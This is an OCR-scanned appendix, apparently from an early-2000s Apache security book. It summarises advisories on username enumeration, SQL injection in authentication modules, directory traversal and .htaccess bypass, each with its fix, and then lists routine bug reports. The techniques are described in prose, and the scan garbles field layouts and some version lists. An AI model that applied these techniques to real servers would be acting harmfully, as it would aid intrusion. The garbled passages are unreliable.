and reports http://[path]/[file.jsp] (The system cannot find 
the file specified). Doh! 


Upgrade to OJSP 1.1.2.0.0. Get it at http: //otn.oracle.com/soft- 


ware/tech/java/servlets/content.html. 


http://www. securityfocus.com/archive/1/214577 


Red Hat Apache Remote Username Exposure 


Date: 

Apache Report No: 
Source: 

Versions: 


Description: 


September 12, 2001 
N/A 

Alexander A. Kelner 
Red Hat Linux 7.0 


This doesn’t lead to system compromise. Instead, it exposes your system 
to intelligence gathering. It works like this: Attackers can use Web 
clients to ascertain valid usernames by trying http://www. foo.com/ 
~username. Apache will throw different status codes—200, 403, or 404— 


depending on what it finds. For example, if a user exists and has a 


Fix: 


References: 


Mac OS X Apache 
Date: 
Apache Report No: 
Source: 
Versions: 


Description: 


Fix: 


References: 
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home page, Apache returns the home page. However, if a user exists 
but has no home page, Apache reports an access permission error. 
Finally, if no such user exists, Apache reports that it cannot find the 
specified index. Through this mechanism, attackers can differentiate 
valid usernames from invalid ones. They needn't do it one at a time, 
either, or even three at a time. URL-grabbing tools such as curl (avail- 
able at http: //curl.haxx.se/) enable attackers to automate such 
discovery. Indeed, curl is powerful and, when driven by a shell script, 
can check for usernames against a 250,000-word dictionary. Everything 
is clean, automated, and effective. Moreover, because curl needs only 
return status headers, attackers can do this at high speed with low over- 
head. 


Disable UserDir or hard-code an HTML source file for Apache to return 


in such instances. 


http://www. securityfocus.com/archive/1/213667 


Directory Disclosure 

September 10, 2001 

N/A 

Jacques Distler 

Apache 1.3.14Mac, Mac OS X 10.0, 10.0.1, 10.0.2, and 10.0.3 


This hole is extremely limited in its scope. When attackers use the Mac 
OS X client and request a URL from affected systems, Apache reveals a 
directory’s contents if the request includes a specification of a .DS_Store 
file. 


No official patch. Distler advises using the <FilesMatch> directive to 
shut out access. <FilesMatch> enables you to specify what Apache does 
when a client requests the specified file type. For this, <FilesMatch> 
uses basic regular expression pattern matching. For example, to disallow 


access to gif or jpeg files, use <FilesMatch "\.(gif|jpe?g)$">. 


See the message dated 8 Aug 2001 with the subject “More security 
problems in Apache on Mac OS X” at http: //www.macintouch.com/ 


mosxreaderreports46.html. 
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mod_auth_oracle SQL Vulnerability 


Date: 
Apache Report No: 
Source: 


Versions: 


Description: 


Fix: 


References: 


September 5, 2001 
N/A 
Florian Weimer of RUS-CERT (University of Stuttgart) 


mod_auth_oracle 0.5.1 and Apache 0.8.14, 1.0, 1.0.2, 1.0.3, 1.0.5, 
1.1, 1.1.1, 1.2, 1.2.5, 1.3, 1.3.1, 1.3.3, 1.3.4, 1.3.9, 1.3.11, 1.3.12, 
1.3.14, 1.3.17, 1.3.18, 1.3.19, and 1.3.20; Oracle7 7.3.3, Oracle7 
7.3.4, Oracle8 8.0.3, Oracle8 8.0.4, Oracle8 8.0.5, Oracle8 8.0.5.1, 
Oracle8 8.0.6, Oracle8 8.1.6, , Oracle8 8.1.7, Oracle8i 8.0.5, Oracle8i 
8.0.6, Oracle8i 8.1.5, Oracle8i 8.1.6, Oracle8i 8.1.7, Oracle9i 9.0, and 
Oracle9i 9.0.1 


mod_auth_oracle is an authentication module originally designed by 
Serg Oskin for Oracle7 or Oracle8/8i clients. It gained more widespread 
use in Apache 1.3 to Oracle8/8i and offers database-based authentica- 
tion using Oracle. Affected versions allow remote attackers to send SQL 


commands and, in limited circumstances, alter tables. 
Get 0.5.4 at http: //www.macomnet.ru/~oskin/mod_auth_oracle.html. 


http: //cert.uni-stuttgart.de/advisories/Apache_auth.php 


PHPMyExplorer File Disclosure 


Date: 
Apache Report No: 
Source: 


Versions: 


Description: 


Fix: 


References: 


August 29, 2001 
N/A 
Ben Ford 


PHPMyExplorer Classic 1.0, Classic 1.1.0, Classic 1.1.1, Classic 1.1.3, 
Classic 1.1.4, Classic 1.1.5, Classic 1.2, and MultiUser 1.0 
PHPMyExplorer is a front end that lets you manage sites through a 
browser. Affected versions have a critical flaw: They allow attackers to 
break out of DocumentRoot and browse the greater file system at will. 


This is a disastrous hole that can lead to root compromise. 
Update to 1.2.1. 


http://www. securityfocus.com/cgi-bin/ 


vulns-item.pl?section=inf0&id=3266 
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mod_auth_pgsql SQL Vulnerability 


Date: 
Apache Report No: 
Source: 


Versions: 


Description: 


Fix: 


References: 


August 29, 2001 
N/A 
Florian Weimer of RUS-CERT (University of Stuttgart) 


mod_auth_pgsql1 0.9.5 plus Apache 0.8.11, 0.8.14, 1.0, 1.0.2, 1.0.3, 
nS, 1.1, 121.1, 1.2), 1.2.5, 1.3, 153-1, 1.3.3, 1.34; 133.9, 173:11, 
1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, and 1.3.20; PostgreSQL 6.3.2 
and 6.5.3; also mod_auth_pgsql 0.9.6 plus Apache 0.8.11, 0.8.14, 
1.0.2,, 1.0.3, 1.0.5, 1.1, 1.1.1, 1.2, 1.2.5, 1.3, 1.3.1, 1.3.3, 1.3.4, 1.3.9, 
1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, 1.3.20; and PostgreSQL 
6.3.2/6.5.3 


Giuseppe Tanzilli’s mod_auth_pgsq1 is an Apache authentication module 
for 1.3 to PostgreSQL. (Learn more at 

http://www. giuseppetanzilli.it/mod_auth_pgsql.) mod_auth_pgsql 
provides database authentication via PostGRES. Affected versions allow 
remote attackers to send SQL commands and, in limited circumstances, 


alter tables. 
Upgrade to 0.9.9. 


http: //cert.uni-stuttgart.de/advisories/Apache_auth.php 


mod_auth_pgsql_sys SQL Vulnerability 


Date: 
Apache Report No: 
Source: 


Versions: 


Description: 


Fix: 


References: 


August 29, 2001 
N/A 
Florian Weimer of RUS-CERT (University of Stuttgart) 


mod_auth_pgsql_sys 0.9.4 plus Apache 0.8.11, 0.8.14, 1.0, 1.0.2, 
1.0.3, 1.0.5, 1.1, 1.1.1, 1.2, 1.2.5, 1.3, 1.3.1, 1.3.3, 1.3.4, 1.3.9, 
1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, 1.3.20, and PostgreSQL 
6.3.2/6.5.3 


Giuseppe Tanzilli’s mod_auth_pgsql_sys is an Apache authentication 
module component for PostgreSQL. (Learn more at 

http://www. giuseppetanzilli.it/mod_auth_pgsql.) mod_auth_pgsql 
provides database authentication via PostGRES. Affected versions allow 
remote attackers to send SQL commands and, in limited circumstances, 


alter tables. 
Check with the author (or use mod_auth_pgsql 0.9.9 instead). 


http: //cert.uni-stuttgart.de/advisories/Apache_auth.php 
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mod_auth_pg SQL Vulnerability 


mod_ 


Date: 

Apache Report No: 
Source: 

Versions: 


Description: 


Fix: 


References: 


August 29, 2001 

N/A 

Florian Weimer of RUS-CERT (University of Stuttgart) 
Earlier than 1.3 


Min S. Kim’s mod_auth_pg is an Apache authentication module compo- 
nent for PostgreSQL. (Learn more at 

http: //authpg.sourceforge.net/.) mod_auth_pg provides database 
authentication via PostGRES. Affected versions allow remote attackers to 


send SQL commands and, in limited circumstances, alter tables. 
Upgrade to AuthPG 1.3. 


http: //cert.uni-stuttgart.de/advisories/Apache_auth.php 


auth_mysql SQL Vulnerability 


Date: 
Apache Report No: 
Source: 


Versions: 


Description: 


Fix: 


References: 


August 29, 2001 
N/A 
Florian Weimer of RUS-CERT (University of Stuttgart) 


mod_auth_mysql 1.9 plus Apache 0.8.11, 0.8.14, 1.0, 1.0.2, 1.0.3, 
1.0.5, 1.1,, 1.1.1, 1.2, 1.2.5, 1.3, 1.3.1, 1.3.3, 1.3.4, 1.3.9, 1.3.11, 
1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, and 1.3.20; MySQL 3.22.26, 
3.22.27, 3.22.28, 3.22.29, 3.22.30, 3.22.32, 3.23.2, 3.23.3, 3.23.4, 
3.23.5, 3.23.8, 3.23.9, 3.23.10, 3.23.23, 3.23.24, 3.23.25, 3.23.26, 
3.23.27, 3.23.28, 3.23.29, 3.23.30, 3.23.31, 3.23.34, and 3.23.36 


Vivek Khera’s mod_auth mysql is an Apache authentication module 
component for MySQL. (Learn more at ftp://ftp.sage- 
au.org.au/pub/network/www/Apache-msql/.) mod_auth_mysql 
provides database authentication via MySQL. Affected versions allow 
remote attackers to send SQL commands and, in limited circumstances, 


alter tables. 
Upgrade at ftp: //ftp.kcilink.com/pub/. 


http: //cert.uni-stuttgart.de/advisories/Apache_auth.php 
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Apache mod_rewrite Rules Image Link Weakness 


Date: 
Apache Report No: 
Source: 


Versions: 


Description: 


Fix: 


References: 


August 12, 2001 
N/A 
Jeff Workman 


Apache 1.3.14 + EnGarde Secure Linux 1.0.1, Mandrake 7.1, Mandrake 
7.2, MandrakeSoft Single Network Firewall 7.2, Apache 1.3.17, 
MandrakeSoft Corporate Server 1.0.1, Mandrake 8.0, Mandrake 8.0 
PPC, OpenBSD 2.8, SuSE Linux 7.1, Apache 1.3.19, Apple Mac OS X 
10.0.3, Caldera eDesktop 2.4, Caldera eServer 2.3.1, Caldera OpenLinux 
2.4, Debian Linux 2.3, Digital (Compaq) TRU64/DIGITAL UNIX 4.0f, 
Digital (Compaq) TRU64/DIGITAL UNIX 4.0g, Digital (Compaq) 
TRU64/DIGITAL UNIX 5.0, FreeBSD 3.5.1, FreeBSD 4.2, hp-UX 10.20, 
hp-UX 11.0, hp-UX 11.11, Mandrake 7.1, Mandrake 7.2, Mandrake 8.0, 
Mandrake 8.1, NetBSD 1.5, NetBSD 1.5.1, OpenBSD 2.8, OpenBSD 2.9, 
Red Hat 6.2, Red Hat 7.0, Red Hat 7.1, SuSE Linux 6.4, SuSE Linux 7.0, 
SuSE Linux 7.1, SGI IRIX 6.5.8, SGI IRIX 6.5.9, Solaris 7.0, Solaris 8.0, 
and Apache 1.3.20 


Attackers can bypass Rewrite rules and thus access restricted portions of 
your Web directory hierarchy. In doing so, they can download materials 
(such as images) and perhaps, by recursive or overzealous download 


cycles, cause a denial of service attack. 


For Unix and Windows users, write more stringent rewrite rules that 
provide for directories with large amounts of data therein (such as 
image directories). For Mac OS X users, Apple released a fix (Apple 
Hotfix WebSharingUpdate 1.0) located at 

http: //wsidecar.apple.com/cgi-bin/nph- 
reg3rdpty1.p1/product=00733&platform=osx&method=sa/WebSharing 
Update.dmg.bin. 


http://www. securityfocus.com/archive/1/203955 


Apache Network Address Exposure 


Date: 
Apache Report No: 


Source: 


August 9, 2001 
N/A 
H.D. Moore 


518 APPENDIX B Apache Security Advisories and Bugs 


Versions: 


Description: 


Fix: 


References: 


Apache 1.0, 1.2, 1.3 and Windows 2000, NT 4.0 


Attackers can use a custom-crafted URL to discover an Apache server's 
real network address. To try it—and perhaps automate it across your 
subnet—get magnum’s disclosure tool from http: //downloads. 


securityfocus.com/vulnerabilities/exploits/disclose.c. 


Disable UseCanonicalName and explicitly set the server’s appropriate 
name with ServerName. Learn more in Chapter 10, “Apache Network 
Access Control,” or in Appendix A, “Apache Security-Related Modules 
and Directives.” 


http: //httpd.Apache.org/docs/mod/core.html#usecanonicalname 


Cross-Host-Scripting (Tomcat) 


Date: 
Apache Report No: 
Source: 


Versions: 


Description: 


Fix: 


References: 


July 2, 2001 
N/A 
Hiromitsu Takagi 


Tomcat 3.2.1, BSD/OS 4.0, OpenLinux 2.4, Conectiva 5.1, Debian 2.1, 
Debian 2.2, Digital UNIX 4.0, FreeBSD 4.0, FreeBSD 5.0, HP Secure 
Software for Linux 1.0, Mandrake 7.0, Mandrake 7.1, NetBSD 1.4.1 
x86, NetBSD 1.4.2 x86, Red Hat 6.1 i386, Red Hat 6.2 i386, IRIX 6.4, 
IRIX 6.5, Solaris 7.0, and Solaris 8.0 


Embedded scripting in affected versions bypasses filtering, thus allowing 
malicious Webmasters to use third-party scripts from another host to 


breach client security. 
Upgrade 


http://www. securityfocus.com/archive/1/194464 


Mac OS X Client File Protection Bypass 


Date: 
Apache Report No: 
Source: 


Versions: 


June 10, 2001 
N/A 
Stefan Arentz 


Apache 1.3.14Mac, Mac OS X 10.0, Mac OS X 10.0.1, Mac OS X 
10.0.2, Mac OS X 10.0.3 


Description: 


Fix: 


References: 
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HFS+ is case-insensitive while Apache is not. Using the Mac client, 
attackers can access files normally filtered out by Apache by changing 
their appropriate, case-sensitive names to case-insensitive ones. In this 
way, attackers can bypass file protections. (For example, by asking for 
. HTACCESS instead of .htaccess, they can grab your ACL file.) 


This is patched in Mac OS X Server, so you could upgrade to that. 
Otherwise, when you limit file access, do so for lowercase, uppercase, 
and mixed names using regex rules, like this: 

<Files ~ "*\.(ht|HT|Ht|hT) ">. 


http://www. securityfocus.com/archive/1/190036 


Webmin Environment Variable Disclosure 


Date: 
Apache Report No: 
Source: 


Versions: 


Description: 


Fix: 


References: 


May 26, 2001 
N/A 
J. Nick Koston 


Webmin 0.5x, Webmin 0.6, Webmin 0.7, Webmin 0.8.3 plus OpenLinux 
2.3, OpenLinux 2.4, Corporate Server 1.0.1, Mandrake 7.1, Mandrake 
7.2; Webmin 0.8.4 plus eDesktop 2.4, eServer 2.3.1, OpenLinux 
Desktop 2.3, Mandrake 7.1, Mandrake 7.2; Webmin 0.80 or Webmin 
0.85 plus OpenLinux 2.3, OpenLinux 2.4, Corporate Server 1.0.1, 
Mandrake 7.1, and Mandrake 7.2 


Webmin is a management system for Apache servers, written in Perl, 
that enables Web administrators to manage the system (including the 
greater file system's security, which daemons run, and so on). The 
problem is that Webmin’s Perl-based CGI reveals your login and pass- 
word in a mime-64-encoded URL. This could easily lead to root compro- 


mise. 


All vendors have issued patches. Check the reference URL or contact 


your vendor. 


http://www. securityfocus.com/cgi-bin/vulns - 


item.pl?section=solution&id=2795 


Apache HTTP Request Denial of Service 


Date: 


Apache Report No: 


April 12, 2001 
N/A 


520 APPENDIX B Apache Security Advisories and Bugs 


Source: Auriemma Luigi and William A. Rowe, Jr. 


Versions: Apache 1.3.12win32 on Microsoft Windows 95, 98, 2000, 2000 SP1, 
2000 SP2, NT 4.0, NT 4.0SP1, and so on 


Description: Using a custom-crafted (and short) URL, anyone with a Web browser 


can either hang Apache or run the processor to 100% utilization. 
Fix: Upgrade 


References: http://www. securityfocus.com/archive/1/176144 


JSP Source Disclosure 
Date: April 12, 2001 
Apache Report No: N/A 
Source: Sverre H. Huseby 


Versions: Tomcat 3.2.1 plus BSD/OS 4.0, OpenLinux 2.4, Conectiva 5.1, Debian 
2.1, Debian 2.2, Digital UNIX 4.0, FreeBSD 4.0, FreeBSD 5.0, HP Secure 
Software for Linux 1.0, Mandrake 7.0, Mandrake 7.1, NetBSD 1.4.1 
x86, NetBSD 1.4.2 x86, Red Hat Linux 6.1 i386, Red Hat Linux 6.2 
i386, SGI IRIX 6.4, SGI IRIX 6.5, Solaris 7.0, Solaris 8.0; Tomcat 4.0 plus 
BSD/OS 4.0, OpenLinux 2.4, Conectiva 5.1, Debian 2.1, Debian 2.2, 
Digital UNIX 4.0, FreeBSD 4.0, FreeBSD 5.0, Mandrake 7.0, Mandrake 
7.1, NetBSD 1.4.1 x86, NetBSD 1.4.2 x86, Red Hat Linux 6.1 i386, Red 
Hat Linux 6.2 i386, SGI IRIX 6.4, SGI IRIX 6.5, Solaris 7.0, Solaris 8.0; 
BEA Systems WebLogic Server 5.1; Apache 1.3.9, Apache Group Apache 
1.3.9win32, Apache Group Apache 1.3.12, C2Net StrongHold eb Server 
3.0, HP HP-UX 10.20, HP HP-UX 11.0, IBM AIX 4.2, IBM AIX 4.3, 
Microsoft IIS 4.0, Microsoft IIS 5.0, Microsoft Windows 95, Microsoft 
Windows 98, Microsoft Windows 2000, Microsoft Windows NT 4.0, Red 
Hat Linux 5.1, Solaris 8.0 


Description: Tomcat, when it receives certain malformed URLs, will reveal your JSP 
source. 

Fix: Upgrade 

References: http://www. securityfocus.com/archive/1/176144 


8192 Character Denial-of-Service Attack 
Date: April 5, 2001 
Apache Report No: 7522 


Source: 
Versions: 


Description: 


Fix: 


References: 
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Kaino 
Earlier than 1.3.20 on Win32, WinNT, 2000, OS/2 


Attackers could send a string of 8,192 characters to place the server in 
an idle state; sending further strings would produce a bona fide crash in 


some instances. 
Patched in 1.3.20 


http://bugs.Apache.org/index.cgi/full/7522 


Bug Report Structure 


Bug reports include the fields enumerated in Table B.1. 


TABLE B.1 Fields in Apache Bug Reports 





Field Significance 

Number: The report tracking number 

URL: The full report’s network location 

Synopsis: A brief description of the problem 

Responsible: The module or component where the problem is 
Class: Type of bug 

Arrival-Date: The date on which Apache received the report 
Closed-Date: The date on which the Apache team closed the report 
Originator: The human or organization that discovered the bug 
Release: The Apache release that the bug affects 


Environment: 
Description: 


The environment in which the bug operates 
An extended discussion on the issue 
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Number: 
URL: 
Synopsis: 
Responsible: 


Arrival Date: 


Closed Date: 


Originator: 


Release: 


7028 
http://bugs.Apache.org/index.cgi/full/7028 
Apache server doesn’t start 

Apache 

Thu Jan 04 06:00:01 PST 2001 

Wed Mar 21 22:43:32 PST 2001 
ddubrann@capgemini.fr 


1.3.14 
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Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


A simple Win95 PC station 


This bug produces the error setup_inherited_listeners: WSASocket 
failed to open the inherited socket. Likely causes are a) you're 
using outdated DLLs, including wsock32.dll, ws2help.dll, and 
ws2_32.dll; or b) you're using VPN software (Aventail is one candidate). 
The most likely issue, however, is an outdated Winsock distribution (and 
this also affects 1.3.9). Upgrade. 


7041 
http://bugs.Apache.org/index.cgi/full/7041 
CGI scripts won’t always run 

Apache 

Sun Jan 07 15:50:00 PST 2001 

Thu Feb 15 13:38:43 PST 2001 
rmstewar@ix.netcom.com 

1.3.14 

Windows 95 


CGI scripts, compiled COM and EXE files, C programs, Fortran 
programs, and even DOS batch files run from a prompt but won’t 
execute through a client request. The problem is limited to 1.3.14 and 
arises because pipes that handle CGI streams neither open nor close 


correctly. The solution is to upgrade. 


7042 
http://bugs.Apache.org/index.cgi/full/7042 
Apache is freezing, not responding 

Apache 

Mon Jan 08 11:10:00 PST 2001 

Tue Jan 23 13:28:37 PST 2001 

sr@is24.de 

1.3.12 

Dual PII 450 MHz + SCSI on WinNT4.0 SP6A 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 
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This bug produces the following entry in error_log: [notice] 
jrApache[1023] [1156] dropped. At that point, Apache dies. This is 
not attributable to core Apache but is a problem with JRun. JRun is a 
server extension that enables ISAPI-enabled servers to execute Java 
servlets. If you don’t fancy Perl, C, C++, PHP, COBOLScript, or other 
scripting languages to facilitate CGI, and Java is your thing, try JRun. 


Find it at http: //www.macromedia.com/software/jrun/. 


7062 

http: //bugs.Apache.org/index.cgi/full/7062 
JSP technical problem with Apache 1.3 

Apache 

Sat Jan 13 01:50:00 PST 2001 

Mon Jan 15 18:01:34 PST 2001 
diemln@fpt.com.vn 

1.3 

Linux Mandrake 7.0, Kernel 2.2.15-4mdk 


The originator wanted to run JSP on his Mandrake server without using 

Tomcat. Apache authorities explained that Mandrake’s Apache is highly 

customized and supports many functions that are not standards compli- 
ant. Hence, the Apache folks couldn't help out. If you encounter this 


problem, contact Mandrake. 


7063 

http: //bugs.Apache.org/index.cgi/full/7063 
mod_auth_digest BAD_REQUEST 

Apache 

Sat Jan 13 10:00:00 PST 2001 

Unspecified 

mdyla@elb2.pl 

1.3.14 


Linux Slackware 
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Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


This bug manifests itself when a query string appears in the URI (with 
JSP, for example) and mod_auth_digest chokes, reporting a bad 
request. (To learn more about mod_auth_digest, see Appendix A or 
Chapter 13.) Reportedly, the fix is to disable query comparison support 


in authenticate_digest_user. 


7069 

http: //bugs.Apache.org/index.cgi/full/7069 
Cannot upload binaries to the server 

Apache 

Mon Jan 15 02:30:00 PST 2001 

Unspecified 

weetat@cesma.com.sg 

1.3.14 

Linux 6.1, JDK 1.2.2, IE 5.0, Netscape 4.1 


This isn't an Apache bug. The originator designed Java servlets that 
included file upload capability. The applications would upload only text 
files. If you encounter the same problem, contact this fellow. He doubt- 


less solved it on his own. 


7077 
http://bugs.Apache.org/index.cgi/full/7077 
byteserving 

Apache 

Tue Jan 16 10:00:00 PST 2001 

Unspecified 

rv33100@GlaxoWellcome.co.uk 

1.3.14 

Sun Solaris 2.7 and gcc 


This bug arises when a client loads a PDF file inline and PDF back- 
ground processing is enabled. It is restricted to Acrobat 4.0 in conjunc- 
tion with Netscape 4.x or IE 4.x and 5.x. This problem, which Tony 
Finch corrected, stemmed from http_protocol.c. The patch for the 
byte ranging problem—an issue on 1.3.14—is at 


http: //Apache.org/~fanf /http_protocol.patch. fanf. 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 
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7092 
http://bugs.Apache.org/index.cgi/full/7092 
HTTP stops serving pages 

Apache 

Thu Jan 18 02:20:01 PST 2001 

Unspecified 

pm@seascopegroup.com 

1.3.6 

AIX 


This bug, which apparently hasn't yet been addressed, echoes a 
ws_read_domain_link error to error_log. Reportedly, this error jams all 
running instances of HTTPD, resulting in resource starvation. 
Unfortunately, one can only recover by restarting HTTPD, but it still 
returns to its former behavior. So far as | can tell, no fix is forthcoming 
or, if so, it hasn’t been recorded. If you’re having this problem, check 


with the originator. 


7096 

http: //bugs.Apache.org/index.cgi/full/7096 
Not secure enough 

Apache 

Thu Jan 18 13:20:02 PST 2001 

Thu Jan 18 15:35:12 PST 2001 
steeven@kali.com.cn 

All 

Linux 2.16, Apache 1.3.14 


The originator was concerned about security of scripts run out of /cgi- 
bin/, and its UID/GID. Apache personnel responded by directing the 
originator to a document that every Apache administrator should read: 
http://httpd.Apache.org/docs/suexec.html. The suEXEC feature— 
introduced in Apache 1.2—provides Apache users the ability to run CGI 
and SSI programs under user IDs different from the user ID of the calling 
Web server. This solves the problem of crackers exploiting the Web 


server's permissions. 
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Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


7129 
http://bugs.Apache.org/index.cgi/full/7129 
CGI support under Network is not working 
Apache 

Thu Jan 25 05:20:00 PST 2001 

Unknown 

christian@hofstaedtler.com 

1.3.14 

Novell NetWare 5.1 SP1, precompiled binaries 


Reportedly, mod_cgi isn’t compiled into prebuilt binaries for Novell 
under 1.3.14. Your options are to build from a source distribution or 
upgrade. 


7138 

http: //bugs.Apache.org/index.cgi/full/7138 

Floating Point Exception 

Apache 

Sat Jan 27 13:40:00 PST 2001 

Sat Jan 27 18:06:14 PST 2001 

goro@phps.com.ar 

1.3.14 

Linux 2.0.34 on a cobalt raq2 mips 

This isn't an Apache problem. The originator explained that previous 
Apache installations worked but that when he installed PHP, the float- 
ing-point error appeared. Jason Nugent from stomped.com explained 
the glitch: The PHP 4.0.4 ./configure script doesn’t properly detect 
the SRAND48 function. In 4.0.4 (and perhaps earlier versions), edit 
main/php_config.h and set SRAND48’s definition to #define SRAND48 
O rather than #define SRAND48 1—even though PHP’s authors say 
“Generated automatically from configure.in by autoheader” and “Leave 
this file alone.” You'll find that definition on lines 396 and 397 of 


php_config.h (at least on the one dated September 22, 2000, with an 
MDS sig of 3e481210d84c9e40556af30d4dfab6a8). 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


The Critical Listings 527 


7144 

http: //bugs.Apache.org/index.cgi/full/7144 
Problem with link.exe compiling with NMAKE 
Apache 

Sun Jan 28 14:50:01 PST 2001 

Unspecified 

kia_dabirian@yahoo.com 

1.3.14 

win2000, nmake, VC++ 


This bug entails a fatal error when building htdigest.exe with nmake 
and VC++. Apache personnel haven't dealt with this, chiefly because it’s 
not an Apache issue. Rather, users trying such a build must first fix their 
project settings for the C++ runtime and plug in Multithreaded DLL 
debugging. The most common cause of this error is accidentally linking 
with both the single-threaded and multithreaded libraries. Ensure that 
the application project file includes only the appropriate libraries and 
that any third-party libraries have appropriately created single-threaded 
or multithreaded versions. See MSDN’s VC++ Documentation Library 
entries on Linker Tools Error LNK1169 and Linker Tools Error 
LNK2005. Note that the /FORCE or /FORCE:MULTIPLE options also over- 
ride this error (and thus, succeeding errors), but in this instance, don’t 
use them. With a utility as important as htdigest.exe, do it right. htdi- 
gest.exe handles your digest-based user authentication, which is not 


something you want to approximate. 


7152 

http: //bugs.Apache.org/index.cgi/full/7152 
Apache processes halt after heavy traffic 

Apache 

Mon Jan 29 10:50:03 PST 2001 

Unspecified 

assi_st@yahoo.com 

1.3.12 

Linux 2.2.16 i686 unknown 
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Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 


Responsible: 


This bug is recondite and is reproducible only in certain situations. The 
originator established a reverse proxy system whereby the proxy 
receives client requests and redirects these to a server. Heavy traffic 
causes HTTPD processes to hang and you can recover only by restarting 
HTTPD cold. The Apache team produced no fix for this, nor am | sure 
that one exists. Essentially, the originator (or anyone, for that matter) 
should rethink this configuration. Otherwise, they might invite denial-of- 


service or resource starvation attacks. 


7153 

http: //bugs.Apache.org/index.cgi/full/7153 

Problem with blank in URL on Netscape 

Apache 

Mon Jan 29 17:20:00 PST 2001 

Mon Jan 29 19:04:33 PST 2001 

ggvs@free.fr 

1.3.14 

Win98 

This bug report raises a valid question that many Windows users ask. 
The originator had directories and files that contained whitespace gaps 
in their names. When Netscape called these URLs, Apache would reply 
that the requested resources could not be found. There are two things 
to keep in mind: First, as explained in Apache’s reply, “Unencoded 
spaces are not permitted in URLs. Allowing URLs with spaces would 
cause serious problems in HTTP. Some browsers may clean these up for 
you before sending (by hex-encoding them), but in general, you should 
not expect them to work.” Second, when pointing to such a URL (and 
such URLs are a terrible idea) you can reach it by using the %20 charac- 
ter sequence, which simulates a blank space wherever needed, as the 


filler. However, don’t break filenames with spaces. Few users know to 


use hex encoding and most browsers don’t help. 


7158 
http: //bugs.Apache.org/index.cgi/full/7158 
Rewrite map doesn’t work anymore 


Apache 


Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 
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Tue Jan 30 11:10:03 PST 2001 

Thu Feb 01 01:16:59 PST 2001 

cholet@logilune.com 

1.3.17 

FreeBSD 2.2.7-RELEASE 

This bug in RewriteMap handling in Apache 1.3.17 causes ${} expan- 
sions to be ignored. It’s a problem in mod_rewrite.c and there is a fix. 
However, the link to the fix Apache provides in its bug database no 


longer works. Try http: //bigfoot.eecs.umich.edu/pub/NetBSD/pack - 
ages/distfiles/Apache_1.3.17-fix.diff instead. 


7159 

http://bugs.Apache.org/index.cgi/full/7159 
Solaris bug that causes HTTPD to hang in sleeping state 
Apache 

Tue Jan 30 11:30:03 PST 2001 

rmeyer@befree.com 

1.3.12 

SunOS devfe01 5.6 Generic Ultra-2 sun4 


This bug, the originator felt, was based in Solaris, but he thought he 
might have better luck with Apache personnel. This fellow’s reporting of 
the bug was so incredibly precise (he included full output from gdb, 
and compilation notes nested in his browser’s HTML) that tech support 
people might have distributed it as a joke. Unfortunately, it was no joke. 
At any rate, after pages and pages (and likely, much effort on the origi- 
nator’s part), the bottom line was this: “Sorry for the mixup, but you 
can close this problem. It turned out to be a problem with the script 
that Oracle had provided to link in their OCI libraries.” | can sympathize 
with the originator. OCI is my least favorite Web-to-database technol- 
ogy. Try it with C (after running your stuff through ProC) or PHP some- 
time. It’s not a pretty sight. 


7173 
http://bugs.Apache.org/index.cgi/full/7173 


installation problem when executing Apache.exe 
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Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 


Originator: 


Apache 

Wed Jan 31 21:10:00 PST 2001 
Sat Feb 03 16:46:54 PST 2001 
arachne@pacbell.net 

1,3 

Win98 


The originator purchased Julie Meloni’s PHP Fast & Easy Web 
Development (ISBN: 076153055X), which ships with Apache, among 
other things. He installed Apache and tried to run it. He then encoun- 
tered Can not determine host name. This is not a bug. Try 


ServerName IP-Address. 


7177 
http: //bugs.Apache.org/index.cgi/full/7177 


A bad httpd.conf in the distribution (for which you must set your 


ServerName value). 

Apache 

Fri Feb 02 02:50:00 PST 2001 

Unspecified 

cbrown@reflexe.fr 

1.3.17 

Windows NT4, Apache 1.3.17 winbinaries 


The originator mistakenly thought that the Win32 distribution 
contained Unix-only and Unix-centric files. It doesn’t. See the 


mod_so.htm1 docs. The Windows binary distribution works. 


7179 
http://bugs.Apache.org/index.cgi/full/7179 


Server does not respond and logs (in httpd_errors): [error] 


(9)Bad file number: accept: (client socket) 
Apache 

Fri Feb 02 07:30:02 PST 2001 

